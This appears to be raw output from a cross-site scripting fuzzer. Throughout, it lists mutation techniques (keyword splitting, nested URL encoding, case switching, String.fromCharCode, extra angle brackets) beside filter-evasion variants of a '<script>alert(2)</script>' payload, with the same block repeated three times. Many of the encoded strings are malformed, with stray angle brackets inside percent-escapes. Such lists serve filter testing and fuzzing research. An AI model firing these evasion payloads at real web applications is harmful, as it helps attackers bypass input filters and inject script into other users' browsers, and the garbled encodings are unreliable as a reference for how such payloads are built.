Mutation algoritm:No_closing_script_tags 
Result: <script>alert(2)</script
Mutation algoritm:keyword_replacing 
Result: ['<scrscriptipt>alert(2)</script>', '<scrscriptipt>alert(2)</script>']
Mutation algoritm:keyword_replacing 
Result: ['<scrscriptipt>alert(2)</script>', '<scrscriptipt>alert(2)</script>']
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %252<F%3<C%251<15CrIpT%3<E%2<565lErT%2<8%2<550%2<9%3<C%2<F%2583c<RiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %25<0D%3<C%25115CrI<pT%3<E%2565lEr<T%2<8%255<0%2<9%3<C%2<F%258<3cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %250<C%3<C%25115CrI<pT%3<E%2565lE<rT%2<8%2<550%2<9%3<C%2<F%2583c<RiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<50A%3<C%2511<5CrIpT%3<E%2565<lErT%2<8%25<50%2<9%3<C%2<F%25<83cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<509%3<C%25115CrI<pT%3<E%256<5lErT%2<8%2<550%2<9%3<C%2<F%25<83cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<F%3<C%25115CrI<pT%3<E%2565lE<rT%2<8%255<0%2<9%3<C%2<F%2<583cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<0%3<C%251<15CrIpT%3<E%2565lEr<T%2<8%25<50%2<9%3<C%2<F%258<3cRiPt%3<C
Mutation algoritm:keywordsplitting 
Result: <scrip<t>al<ert(2)</scr<ipt>
Mutation algoritm:from_char_code 
Result: <script>alert(String.fromCharCode(50))</script>
Mutation algoritm:Extraneous_open_brackets 
Result: <<script>alert(2)<</script>
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525252F%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525250D%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525250C%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525250A%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %25252509%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %25252F%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %252520%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode 
Result: %253Cscript%253Ealert%25282%2529%253C%252Fscript%253E
Mutation algoritm:No_closing_script_tags 
Result: <script>alert(2)</script
Mutation algoritm:keyword_replacing 
Result: ['<scrscriptipt>alert(2)</script>', '<scrscriptipt>alert(2)</script>']
Mutation algoritm:keyword_replacing 
Result: ['<scrscriptipt>alert(2)</script>', '<scrscriptipt>alert(2)</script>']
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %25<2F%3<C%25115<CrIpT%3<E%2<565lErT%2<8%255<0%2<9%3<C%2<F%25<83cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<50D%3<C%25115Cr<IpT%3<E%2565lEr<T%2<8%255<0%2<9%3<C%2<F%2583<cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %250<C%3<C%25<115CrIpT%3<E%25<65lErT%2<8%2<550%2<9%3<C%2<F%2583<cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %250<A%3<C%25115C<rIpT%3<E%2565lEr<T%2<8%25<50%2<9%3<C%2<F%2583cRiP<t%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<509%3<C%25115<CrIpT%3<E%2565lE<rT%2<8%2<550%2<9%3<C%2<F%2583cRiP<t%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<F%3<C%2511<5CrIpT%3<E%2<565lErT%2<8%255<0%2<9%3<C%2<F%2583<cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<0%3<C%2<5115CrIpT%3<E%25<65lErT%2<8%25<50%2<9%3<C%2<F%25<83cRiPt%3<C
Mutation algoritm:keywordsplitting 
Result: <scri<pt>ale<rt(2)</sc<ript>
Mutation algoritm:from_char_code 
Result: <script>alert(String.fromCharCode(50))</script>
Mutation algoritm:Extraneous_open_brackets 
Result: <<script>alert(2)<</script>
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525252F%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525250D%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525250C%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525250A%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %25252509%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %25252F%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %252520%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode 
Result: %253Cscript%253Ealert%25282%2529%253C%252Fscript%253E
Mutation algoritm:No_closing_script_tags 
Result: <script>alert(2)</script
Mutation algoritm:keyword_replacing 
Result: ['<scrscriptipt>alert(2)</script>', '<scrscriptipt>alert(2)</script>']
Mutation algoritm:keyword_replacing 
Result: ['<scrscriptipt>alert(2)</script>', '<scrscriptipt>alert(2)</script>']
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %252<F%3<C%2511<5CrIpT%3<E%2565lE<rT%2<8%2<550%2<9%3<C%2<F%258<3cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %25<0D%3<C%25115CrIp<T%3<E%2565lE<rT%2<8%255<0%2<9%3<C%2<F%258<3cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %250<C%3<C%25<115CrIpT%3<E%256<5lErT%2<8%2<550%2<9%3<C%2<F%2583c<RiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %250<A%3<C%25115Cr<IpT%3<E%2565<lErT%2<8%25<50%2<9%3<C%2<F%2583<cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<509%3<C%25115Cr<IpT%3<E%2565<lErT%2<8%2<550%2<9%3<C%2<F%2<583cRiPt%3<C
Mutation algoritm:keywordsplitting urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<F%3<C%25115CrI<pT%3<E%256<5lErT%2<8%255<0%2<9%3<C%2<F%2583cR<iPt%3<C
Mutation algoritm:keywordsplitting urlecode Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2<0%3<C%25115<CrIpT%3<E%2565<lErT%2<8%2<550%2<9%3<C%2<F%2583<cRiPt%3<C
Mutation algoritm:keywordsplitting 
Result: <scri<pt>aler<t(2)</scri<pt>
Mutation algoritm:from_char_code 
Result: <script>alert(String.fromCharCode(50))</script>
Mutation algoritm:Extraneous_open_brackets 
Result: <<script>alert(2)<</script>
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525252F%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525250D%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525250C%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %2525250A%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %25252509%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode space_replace Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %25252F%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode urlecode Double_open_angle_brackets change_first_char_to_url caseinsensitive 
Result: %252520%25253C%252525115CrIpT%25253E%25252565lErT%252528%25252550%252529%25253C%25252F%25252583cRiPt%25253C
Mutation algoritm:doubleurlecode 
Result: %253Cscript%253Ealert%25282%2529%253C%252Fscript%253E
